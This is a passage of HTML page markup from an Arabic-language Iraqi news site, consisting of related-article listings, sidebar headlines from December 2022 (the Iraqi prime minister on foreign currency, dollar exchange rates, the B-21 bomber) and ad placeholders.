				<p class="title heading-typo"><a href="https://mustaqila.com/%d8%a7%d9%84%d8%b3%d9%88%d8%af%d8%a7%d9%86%d9%8a-%d9%8a%d9%88%d8%ac%d9%87-%d8%a8%d8%a5%d8%ac%d8%b1%d8%a7%d8%a1-%d8%a7%d9%84%d9%85%d8%b9%d8%a7%d9%84%d8%ac%d8%a7%d8%aa-%d8%a7%d9%84%d9%84%d8%a7%d8%b2/" rel="next">السوداني يوجه بإجراء المعالجات اللازمة لتوفير العملة الأجنبية</a></p>
			</div>
		
	</section>
							</div>
							<div class="post-related">

	<div class="section-heading sh-t2 sh-s3 ">

					<span class="h-text related-posts-heading">اقرأ المزيد</span>
		
	</div>

	
					<div class="bs-pagination-wrapper main-term-none  ">
			<div class="listing listing-thumbnail listing-tb-2 clearfix  scolumns-3 simple-grid">
	<div  class="post-522916 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-2 main-term-16487">
<div class="item-inner clearfix">
			<div class="featured featured-type-featured-image">
			<div class="term-badges floated"><span class="term-badge term-16487"><a href="https://mustaqila.com/iq/">اخبار العراق</a></span></div>			<a  title="السوداني يوجه بإجراء المعالجات اللازمة لتوفير العملة الأجنبية" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/1670151312610-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;1670151312610-86x64.jpg&quot;,&quot;210&quot;:&quot;1670151312610-210x136.jpg&quot;,&quot;279&quot;:&quot;1670151312610-279x220.jpg&quot;,&quot;357&quot;:&quot;1670151312610-357x210.jpg&quot;,&quot;750&quot;:&quot;1670151312610-750x430.jpg&quot;,&quot;1600&quot;:&quot;1670151312610.jpg&quot;}}"					class="img-holder" href="https://mustaqila.com/%d8%a7%d9%84%d8%b3%d9%88%d8%af%d8%a7%d9%86%d9%8a-%d9%8a%d9%88%d8%ac%d9%87-%d8%a8%d8%a5%d8%ac%d8%b1%d8%a7%d8%a1-%d8%a7%d9%84%d9%85%d8%b9%d8%a7%d9%84%d8%ac%d8%a7%d8%aa-%d8%a7%d9%84%d9%84%d8%a7%d8%b2/"></a>
					</div>
	<p class="title">	<a class="post-url" href="https://mustaqila.com/%d8%a7%d9%84%d8%b3%d9%88%d8%af%d8%a7%d9%86%d9%8a-%d9%8a%d9%88%d8%ac%d9%87-%d8%a8%d8%a5%d8%ac%d8%b1%d8%a7%d8%a1-%d8%a7%d9%84%d9%85%d8%b9%d8%a7%d9%84%d8%ac%d8%a7%d8%aa-%d8%a7%d9%84%d9%84%d8%a7%d8%b2/" title="السوداني يوجه بإجراء المعالجات اللازمة لتوفير العملة الأجنبية">
			<span class="post-title">
				السوداني يوجه بإجراء المعالجات اللازمة لتوفير العملة الأجنبية			</span>
	</a>
	</p></div>
</div >
<div  class="post-522894 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-2 main-term-83">
<div class="item-inner clearfix">
			<div class="featured featured-type-featured-image">
			<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>			<a  title="السوداني يشكِّل لجنة لتدقيق أرزاق أفراد القوات الأمنية وأعداد الحمايات للضباط" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/162247-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;162247-86x64.jpg&quot;,&quot;210&quot;:&quot;162247-210x136.jpg&quot;,&quot;279&quot;:&quot;162247-279x220.jpg&quot;,&quot;357&quot;:&quot;162247-357x210.jpg&quot;,&quot;750&quot;:&quot;162247-750x430.jpg&quot;,&quot;780&quot;:&quot;162247.jpg&quot;}}"					class="img-holder" href="https://mustaqila.com/%d8%a7%d9%84%d8%b3%d9%88%d8%af%d8%a7%d9%86%d9%8a-%d9%8a%d8%b4%d9%83%d9%90%d9%91%d9%84-%d9%84%d8%ac%d9%86%d8%a9-%d9%84%d8%aa%d8%af%d9%82%d9%8a%d9%82-%d8%a3%d8%b1%d8%b2%d8%a7%d9%82-%d8%a3%d9%81%d8%b1/"></a>
					</div>
	<p class="title">	<a class="post-url" href="https://mustaqila.com/%d8%a7%d9%84%d8%b3%d9%88%d8%af%d8%a7%d9%86%d9%8a-%d9%8a%d8%b4%d9%83%d9%90%d9%91%d9%84-%d9%84%d8%ac%d9%86%d8%a9-%d9%84%d8%aa%d8%af%d9%82%d9%8a%d9%82-%d8%a3%d8%b1%d8%b2%d8%a7%d9%82-%d8%a3%d9%81%d8%b1/" title="السوداني يشكِّل لجنة لتدقيق أرزاق أفراد القوات الأمنية وأعداد الحمايات للضباط">
			<span class="post-title">
				السوداني يشكِّل لجنة لتدقيق أرزاق أفراد القوات الأمنية وأعداد الحمايات للضباط			</span>
	</a>
	</p></div>
</div >
<div  class="post-522892 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-2 main-term-83">
<div class="item-inner clearfix">
			<div class="featured featured-type-featured-image">
			<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>			<a  title="ارتفاع أسعار الدولار مقابل الدينار العراقي في بغداد .. اليوم الاحد" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2020/12/سعر-الدولار-210x136.png" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2020\/12\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;\u0633\u0639\u0631-\u0627\u0644\u062f\u0648\u0644\u0627\u0631-86x64.png&quot;,&quot;210&quot;:&quot;\u0633\u0639\u0631-\u0627\u0644\u062f\u0648\u0644\u0627\u0631-210x136.png&quot;,&quot;279&quot;:&quot;\u0633\u0639\u0631-\u0627\u0644\u062f\u0648\u0644\u0627\u0631-279x220.png&quot;,&quot;357&quot;:&quot;\u0633\u0639\u0631-\u0627\u0644\u062f\u0648\u0644\u0627\u0631-357x210.png&quot;,&quot;574&quot;:&quot;\u0633\u0639\u0631-\u0627\u0644\u062f\u0648\u0644\u0627\u0631.png&quot;}}"					class="img-holder" href="https://mustaqila.com/%d8%a7%d8%b1%d8%aa%d9%81%d8%a7%d8%b9-%d8%a3%d8%b3%d8%b9%d8%a7%d8%b1-%d8%a7%d9%84%d8%af%d9%88%d9%84%d8%a7%d8%b1-%d9%85%d9%82%d8%a7%d8%a8%d9%84-%d8%a7%d9%84%d8%af%d9%8a%d9%86%d8%a7%d8%b1-%d8%a7%d9%84/"></a>
					</div>
	<p class="title">	<a class="post-url" href="https://mustaqila.com/%d8%a7%d8%b1%d8%aa%d9%81%d8%a7%d8%b9-%d8%a3%d8%b3%d8%b9%d8%a7%d8%b1-%d8%a7%d9%84%d8%af%d9%88%d9%84%d8%a7%d8%b1-%d9%85%d9%82%d8%a7%d8%a8%d9%84-%d8%a7%d9%84%d8%af%d9%8a%d9%86%d8%a7%d8%b1-%d8%a7%d9%84/" title="ارتفاع أسعار الدولار مقابل الدينار العراقي في بغداد .. اليوم الاحد">
			<span class="post-title">
				ارتفاع أسعار الدولار مقابل الدينار العراقي في بغداد .. اليوم الاحد			</span>
	</a>
	</p></div>
</div >
<div  class="post-522862 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-2 main-term-83">
<div class="item-inner clearfix">
			<div class="featured featured-type-featured-image">
			<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>			<a  title="تعرف على اهم الطرق التي تمنع اعراض والتهاب المفاصل" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/6387609e42360455423b34b7-210x136.png" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;6387609e42360455423b34b7-86x64.png&quot;,&quot;210&quot;:&quot;6387609e42360455423b34b7-210x136.png&quot;,&quot;279&quot;:&quot;6387609e42360455423b34b7-279x220.png&quot;,&quot;357&quot;:&quot;6387609e42360455423b34b7-357x210.png&quot;,&quot;750&quot;:&quot;6387609e42360455423b34b7-750x430.png&quot;,&quot;768&quot;:&quot;6387609e42360455423b34b7.png&quot;}}"					class="img-holder" href="https://mustaqila.com/%d8%aa%d8%b9%d8%b1%d9%81-%d8%b9%d9%84%d9%89-%d8%a7%d9%87%d9%85-%d8%a7%d9%84%d8%b7%d8%b1%d9%82-%d8%a7%d9%84%d8%aa%d9%8a-%d8%aa%d9%85%d9%86%d8%b9-%d8%a7%d8%b9%d8%b1%d8%a7%d8%b6-%d9%88%d8%a7%d9%84%d8%aa/"></a>
					</div>
	<p class="title">	<a class="post-url" href="https://mustaqila.com/%d8%aa%d8%b9%d8%b1%d9%81-%d8%b9%d9%84%d9%89-%d8%a7%d9%87%d9%85-%d8%a7%d9%84%d8%b7%d8%b1%d9%82-%d8%a7%d9%84%d8%aa%d9%8a-%d8%aa%d9%85%d9%86%d8%b9-%d8%a7%d8%b9%d8%b1%d8%a7%d8%b6-%d9%88%d8%a7%d9%84%d8%aa/" title="تعرف على اهم الطرق التي تمنع اعراض والتهاب المفاصل">
			<span class="post-title">
				تعرف على اهم الطرق التي تمنع اعراض والتهاب المفاصل			</span>
	</a>
	</p></div>
</div >
<div  class="post-522848 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-2 main-term-83">
<div class="item-inner clearfix">
			<div class="featured featured-type-featured-image">
			<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>			<a  title="تركيا : تحالف جديد يضم 4 أحزاب سياسية لدعم ترشيح اردوغان" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/638c214e423604075264a29a-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;638c214e423604075264a29a-86x64.jpg&quot;,&quot;210&quot;:&quot;638c214e423604075264a29a-210x136.jpg&quot;,&quot;279&quot;:&quot;638c214e423604075264a29a-279x220.jpg&quot;,&quot;357&quot;:&quot;638c214e423604075264a29a-357x210.jpg&quot;,&quot;750&quot;:&quot;638c214e423604075264a29a-750x430.jpg&quot;,&quot;768&quot;:&quot;638c214e423604075264a29a.jpg&quot;}}"					class="img-holder" href="https://mustaqila.com/%d8%aa%d8%b1%d9%83%d9%8a%d8%a7-%d8%aa%d8%ad%d8%a7%d9%84%d9%81-%d8%ac%d8%af%d9%8a%d8%af-%d9%8a%d8%b6%d9%85-4-%d8%a3%d8%ad%d8%b2%d8%a7%d8%a8-%d8%b3%d9%8a%d8%a7%d8%b3%d9%8a%d8%a9-%d9%84%d8%af%d8%b9/"></a>
					</div>
	<p class="title">	<a class="post-url" href="https://mustaqila.com/%d8%aa%d8%b1%d9%83%d9%8a%d8%a7-%d8%aa%d8%ad%d8%a7%d9%84%d9%81-%d8%ac%d8%af%d9%8a%d8%af-%d9%8a%d8%b6%d9%85-4-%d8%a3%d8%ad%d8%b2%d8%a7%d8%a8-%d8%b3%d9%8a%d8%a7%d8%b3%d9%8a%d8%a9-%d9%84%d8%af%d8%b9/" title="تركيا : تحالف جديد يضم 4 أحزاب سياسية لدعم ترشيح اردوغان">
			<span class="post-title">
				تركيا : تحالف جديد يضم 4 أحزاب سياسية لدعم ترشيح اردوغان			</span>
	</a>
	</p></div>
</div >
<div  class="post-522875 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-2 main-term-83">
<div class="item-inner clearfix">
			<div class="featured featured-type-featured-image">
			<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>			<a  title="تويتر : شركة آبل استأنفت نشر إعلاناتها بالكامل على المنصة" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/638c2f654c59b749477ada37-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;638c2f654c59b749477ada37-86x64.jpg&quot;,&quot;210&quot;:&quot;638c2f654c59b749477ada37-210x136.jpg&quot;,&quot;279&quot;:&quot;638c2f654c59b749477ada37-279x220.jpg&quot;,&quot;357&quot;:&quot;638c2f654c59b749477ada37-357x210.jpg&quot;,&quot;750&quot;:&quot;638c2f654c59b749477ada37-750x430.jpg&quot;,&quot;768&quot;:&quot;638c2f654c59b749477ada37.jpg&quot;}}"					class="img-holder" href="https://mustaqila.com/%d8%aa%d9%88%d9%8a%d8%aa%d8%b1-%d8%b4%d8%b1%d9%83%d8%a9-%d8%a2%d8%a8%d9%84-%d8%a7%d8%b3%d8%aa%d8%a3%d9%86%d9%81%d8%aa-%d9%86%d8%b4%d8%b1-%d8%a5%d8%b9%d9%84%d8%a7%d9%86%d8%a7%d8%aa%d9%87%d8%a7-%d8%a8/"></a>
					</div>
	<p class="title">	<a class="post-url" href="https://mustaqila.com/%d8%aa%d9%88%d9%8a%d8%aa%d8%b1-%d8%b4%d8%b1%d9%83%d8%a9-%d8%a2%d8%a8%d9%84-%d8%a7%d8%b3%d8%aa%d8%a3%d9%86%d9%81%d8%aa-%d9%86%d8%b4%d8%b1-%d8%a5%d8%b9%d9%84%d8%a7%d9%86%d8%a7%d8%aa%d9%87%d8%a7-%d8%a8/" title="تويتر : شركة آبل استأنفت نشر إعلاناتها بالكامل على المنصة">
			<span class="post-title">
				تويتر : شركة آبل استأنفت نشر إعلاناتها بالكامل على المنصة			</span>
	</a>
	</p></div>
</div >
	</div>
	
	</div></div>
<section id="comments-template-522914" class="comments-template">
	
	
	<p class="comments-closed">
		التعليقات مغلقة.	</p><!-- .comments-closed -->


	</section>
						</div><!-- .content-column -->
												<div class="col-sm-4 sidebar-column sidebar-column-primary">
							<aside id="sidebar-primary-sidebar" class="sidebar" role="complementary" aria-label="Primary Sidebar Sidebar" itemscope="itemscope" itemtype="https://schema.org/WPSideBar">
	<div id="text-16" class=" h-ni w-nt primary-sidebar-widget widget widget_text">			<div class="textwidget"><p><br />
<!-- NewsDetails_side --><br />
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-1920816103235815"
     data-ad-slot="2024752632"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins><br />
</p>
</div>
		</div><div id="bs-thumbnail-listing-1-3" class=" h-ni bs-hidden-xs w-t primary-sidebar-widget widget widget_bs-thumbnail-listing-1"><div class=" bs-listing bs-listing-listing-thumbnail-1 bs-listing-single-tab">		<p class="section-heading sh-t2 sh-s3 main-term-83">

		
							<a href="https://mustaqila.com/last/" class="main-link">
							<span class="h-text main-term-83">
								 كل الاخبار							</span>
				</a>
			
		
		</p>
			<div class="listing listing-thumbnail listing-tb-1 clearfix columns-1">
		<div class="post-522916 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-1 main-term-16487">
	<div class="item-inner clearfix">
					<div class="featured featured-type-featured-image">
				<a  title="السوداني يوجه بإجراء المعالجات اللازمة لتوفير العملة الأجنبية" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/1670151312610-86x64.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;1670151312610-86x64.jpg&quot;,&quot;210&quot;:&quot;1670151312610-210x136.jpg&quot;,&quot;1600&quot;:&quot;1670151312610.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%a7%d9%84%d8%b3%d9%88%d8%af%d8%a7%d9%86%d9%8a-%d9%8a%d9%88%d8%ac%d9%87-%d8%a8%d8%a5%d8%ac%d8%b1%d8%a7%d8%a1-%d8%a7%d9%84%d9%85%d8%b9%d8%a7%d9%84%d8%ac%d8%a7%d8%aa-%d8%a7%d9%84%d9%84%d8%a7%d8%b2/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%a7%d9%84%d8%b3%d9%88%d8%af%d8%a7%d9%86%d9%8a-%d9%8a%d9%88%d8%ac%d9%87-%d8%a8%d8%a5%d8%ac%d8%b1%d8%a7%d8%a1-%d8%a7%d9%84%d9%85%d8%b9%d8%a7%d9%84%d8%ac%d8%a7%d8%aa-%d8%a7%d9%84%d9%84%d8%a7%d8%b2/" class="post-url post-title">
			السوداني يوجه بإجراء المعالجات اللازمة لتوفير العملة الأجنبية		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T15:04:33+03:00">ديسمبر 4, 2022</time></span>
						</div>
			</div>
	</div >
	<div class="post-522914 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-1 main-term-83">
	<div class="item-inner clearfix">
					<div class="featured featured-type-featured-image">
				<a  title="المركزي العراقي :ارتفاع مبيعات الحوالات الخارجية من الدولار نحو  130 مليون" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/08/البنك-المركزي-العراقــي-86x64.jpeg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/08\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;\u0627\u0644\u0628\u0646\u0643-\u0627\u0644\u0645\u0631\u0643\u0632\u064a-\u0627\u0644\u0639\u0631\u0627\u0642\u0640\u0640\u064a-86x64.jpeg&quot;,&quot;210&quot;:&quot;\u0627\u0644\u0628\u0646\u0643-\u0627\u0644\u0645\u0631\u0643\u0632\u064a-\u0627\u0644\u0639\u0631\u0627\u0642\u0640\u0640\u064a-210x136.jpeg&quot;,&quot;1033&quot;:&quot;\u0627\u0644\u0628\u0646\u0643-\u0627\u0644\u0645\u0631\u0643\u0632\u064a-\u0627\u0644\u0639\u0631\u0627\u0642\u0640\u0640\u064a.jpeg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%a7%d9%84%d9%85%d8%b1%d9%83%d8%b2%d9%8a-%d8%a7%d9%84%d8%b9%d8%b1%d8%a7%d9%82%d9%8a-%d8%a7%d8%b1%d8%aa%d9%81%d8%a7%d8%b9-%d9%85%d8%a8%d9%8a%d8%b9%d8%a7%d8%aa-%d8%a7%d9%84%d8%ad%d9%88%d8%a7%d9%84/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%a7%d9%84%d9%85%d8%b1%d9%83%d8%b2%d9%8a-%d8%a7%d9%84%d8%b9%d8%b1%d8%a7%d9%82%d9%8a-%d8%a7%d8%b1%d8%aa%d9%81%d8%a7%d8%b9-%d9%85%d8%a8%d9%8a%d8%b9%d8%a7%d8%aa-%d8%a7%d9%84%d8%ad%d9%88%d8%a7%d9%84/" class="post-url post-title">
			المركزي العراقي :ارتفاع مبيعات الحوالات الخارجية من الدولار نحو  130&hellip;		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T14:50:14+03:00">ديسمبر 4, 2022</time></span>
						</div>
			</div>
	</div >
	<div class="post-522903 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-1 main-term-83">
	<div class="item-inner clearfix">
					<div class="featured featured-type-featured-image">
				<a  title="&#8220;B-21&#8221;  احدث قاذفة قنابل نووية تكشف عنها البنتاغون" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/014226056501758011-86x64.jpeg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;014226056501758011-86x64.jpeg&quot;,&quot;210&quot;:&quot;014226056501758011-210x136.jpeg&quot;,&quot;480&quot;:&quot;014226056501758011.jpeg&quot;}}"						class="img-holder" href="https://mustaqila.com/b-21-%d8%a7%d8%ad%d8%af%d8%ab-%d9%82%d8%a7%d8%b0%d9%81%d8%a9-%d9%82%d9%86%d8%a7%d8%a8%d9%84-%d9%86%d9%88%d9%88%d9%8a%d8%a9-%d8%aa%d9%83%d8%b4%d9%81-%d8%b9%d9%86%d9%87%d8%a7-%d8%a7%d9%84/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/b-21-%d8%a7%d8%ad%d8%af%d8%ab-%d9%82%d8%a7%d8%b0%d9%81%d8%a9-%d9%82%d9%86%d8%a7%d8%a8%d9%84-%d9%86%d9%88%d9%88%d9%8a%d8%a9-%d8%aa%d9%83%d8%b4%d9%81-%d8%b9%d9%86%d9%87%d8%a7-%d8%a7%d9%84/" class="post-url post-title">
			&#8220;B-21&#8221;  احدث قاذفة قنابل نووية تكشف عنها البنتاغون		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T12:31:39+03:00">ديسمبر 4, 2022</time></span>
						</div>
			</div>
	</div >
	<div class="post-522900 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-1 main-term-83">
	<div class="item-inner clearfix">
					<div class="featured featured-type-featured-image">
				<a  title="التناقضات.. وديمومة الحياة" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/images-86x64.jpeg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;images-86x64.jpeg&quot;,&quot;210&quot;:&quot;images-210x136.jpeg&quot;,&quot;295&quot;:&quot;images.jpeg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%a7%d9%84%d8%aa%d9%86%d8%a7%d9%82%d8%b6%d8%a7%d8%aa-%d9%88%d8%af%d9%8a%d9%85%d9%88%d9%85%d8%a9-%d8%a7%d9%84%d8%ad%d9%8a%d8%a7%d8%a9/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%a7%d9%84%d8%aa%d9%86%d8%a7%d9%82%d8%b6%d8%a7%d8%aa-%d9%88%d8%af%d9%8a%d9%85%d9%88%d9%85%d8%a9-%d8%a7%d9%84%d8%ad%d9%8a%d8%a7%d8%a9/" class="post-url post-title">
			التناقضات.. وديمومة الحياة		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T12:26:40+03:00">ديسمبر 4, 2022</time></span>
						</div>
			</div>
	</div >
	<div class="post-522897 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-1 main-term-83">
	<div class="item-inner clearfix">
					<div class="featured featured-type-featured-image">
				<a  title="الجوهر الأساسي للأنساق الثقافية" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/الثقافة-86x64.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;\u0627\u0644\u062b\u0642\u0627\u0641\u0629-86x64.jpg&quot;,&quot;210&quot;:&quot;\u0627\u0644\u062b\u0642\u0627\u0641\u0629-210x136.jpg&quot;,&quot;640&quot;:&quot;\u0627\u0644\u062b\u0642\u0627\u0641\u0629.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%a7%d9%84%d8%ac%d9%88%d9%87%d8%b1-%d8%a7%d9%84%d8%a3%d8%b3%d8%a7%d8%b3%d9%8a-%d9%84%d9%84%d8%a3%d9%86%d8%b3%d8%a7%d9%82-%d8%a7%d9%84%d8%ab%d9%82%d8%a7%d9%81%d9%8a%d8%a9/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%a7%d9%84%d8%ac%d9%88%d9%87%d8%b1-%d8%a7%d9%84%d8%a3%d8%b3%d8%a7%d8%b3%d9%8a-%d9%84%d9%84%d8%a3%d9%86%d8%b3%d8%a7%d9%82-%d8%a7%d9%84%d8%ab%d9%82%d8%a7%d9%81%d9%8a%d8%a9/" class="post-url post-title">
			الجوهر الأساسي للأنساق الثقافية		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T12:21:40+03:00">ديسمبر 4, 2022</time></span>
						</div>
			</div>
	</div >
	<div class="post-522894 type-post format-standard has-post-thumbnail   listing-item listing-item-thumbnail listing-item-tb-1 main-term-83">
	<div class="item-inner clearfix">
					<div class="featured featured-type-featured-image">
				<a  title="السوداني يشكِّل لجنة لتدقيق أرزاق أفراد القوات الأمنية وأعداد الحمايات للضباط" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/162247-86x64.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;162247-86x64.jpg&quot;,&quot;210&quot;:&quot;162247-210x136.jpg&quot;,&quot;780&quot;:&quot;162247.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%a7%d9%84%d8%b3%d9%88%d8%af%d8%a7%d9%86%d9%8a-%d9%8a%d8%b4%d9%83%d9%90%d9%91%d9%84-%d9%84%d8%ac%d9%86%d8%a9-%d9%84%d8%aa%d8%af%d9%82%d9%8a%d9%82-%d8%a3%d8%b1%d8%b2%d8%a7%d9%82-%d8%a3%d9%81%d8%b1/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%a7%d9%84%d8%b3%d9%88%d8%af%d8%a7%d9%86%d9%8a-%d9%8a%d8%b4%d9%83%d9%90%d9%91%d9%84-%d9%84%d8%ac%d9%86%d8%a9-%d9%84%d8%aa%d8%af%d9%82%d9%8a%d9%82-%d8%a3%d8%b1%d8%b2%d8%a7%d9%82-%d8%a3%d9%81%d8%b1/" class="post-url post-title">
			السوداني يشكِّل لجنة لتدقيق أرزاق أفراد القوات الأمنية وأعداد الحمايات&hellip;		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T11:31:29+03:00">ديسمبر 4, 2022</time></span>
						</div>
			</div>
	</div >
	</div>
	</div></div></aside>
						</div><!-- .primary-sidebar-column -->
									</div><!-- .main-section -->
		</div><!-- .layout-2-col -->

	</main><!-- main -->
	</div><!-- .content-wrap -->
<div class='bs-injection bs-injection-post_before_footer bs-injection-2-col bs-vc-content'><div class="row vc_row wpb_row vc_row-fluid"><div class="bs-vc-wrapper"><div class="wpb_column bs-vc-column vc_column_container vc_col-sm-12 vc_hidden-lg vc_hidden-md vc_hidden-sm"><div class="bs-vc-wrapper wpb_wrapper"><div class=" bs-hidden-lg bs-listing bs-listing-listing-classic-2 bs-listing-single-tab">		<p class="section-heading sh-t2 sh-s3 main-term-none">

		
							<span class="h-text main-term-none main-link">
						المزيد من الاخبار					</span>
			
		
		</p>
			<div class="listing listing-classic listing-classic-2 clearfix  columns-1">
		<div class="post-522916 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-16487 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-16487"><a href="https://mustaqila.com/iq/">اخبار العراق</a></span></div>				<a  title="السوداني يوجه بإجراء المعالجات اللازمة لتوفير العملة الأجنبية" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/1670151312610-750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;1670151312610-210x136.jpg&quot;,&quot;279&quot;:&quot;1670151312610-279x220.jpg&quot;,&quot;357&quot;:&quot;1670151312610-357x210.jpg&quot;,&quot;750&quot;:&quot;1670151312610-750x430.jpg&quot;,&quot;1600&quot;:&quot;1670151312610.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%a7%d9%84%d8%b3%d9%88%d8%af%d8%a7%d9%86%d9%8a-%d9%8a%d9%88%d8%ac%d9%87-%d8%a8%d8%a5%d8%ac%d8%b1%d8%a7%d8%a1-%d8%a7%d9%84%d9%85%d8%b9%d8%a7%d9%84%d8%ac%d8%a7%d8%aa-%d8%a7%d9%84%d9%84%d8%a7%d8%b2/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%a7%d9%84%d8%b3%d9%88%d8%af%d8%a7%d9%86%d9%8a-%d9%8a%d9%88%d8%ac%d9%87-%d8%a8%d8%a5%d8%ac%d8%b1%d8%a7%d8%a1-%d8%a7%d9%84%d9%85%d8%b9%d8%a7%d9%84%d8%ac%d8%a7%d8%aa-%d8%a7%d9%84%d9%84%d8%a7%d8%b2/" class="post-title post-url">
			السوداني يوجه بإجراء المعالجات اللازمة لتوفير العملة الأجنبية		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T15:04:33+03:00">ديسمبر 4, 2022</time></span>
						</div>
					</div>
	</div >
	</div>
	</div>
	<div class="wpb_text_column wpb_content_element  bs-vc-block" >
		<div class="wpb_wrapper">
			<div id="jubna26098"></div>
<p></p>

		</div>
	</div>
<div class=" bs-hidden-lg bs-listing bs-listing-listing-classic-2 bs-listing-single-tab">	<div class="listing listing-classic listing-classic-2 clearfix  columns-1">
